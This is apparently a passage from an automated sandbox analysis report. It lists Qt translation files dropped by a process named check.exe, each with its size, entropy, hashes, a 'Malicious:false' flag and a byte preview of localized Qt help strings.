                                                                                                                                                                                                            SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                            MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                            SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                            SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                            SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                            MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                            SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                            SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                            SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293121
                                                                                                                                                                                                            Entropy (8bit):5.272179385890926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                            MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                            SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                            SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                            SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                            Entropy (8bit):3.739162292019161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                            MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                            SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                            SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                            SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.680458675741643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                            MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                            SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                            SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                            SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.463523104731333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                            MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                            SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                            SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                            SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):323590
                                                                                                                                                                                                            Entropy (8bit):4.568068046062524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                            MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                            SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                            SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                            SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                                                            Entropy (8bit):3.880645689209568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                            MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                            SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                            SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                            SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
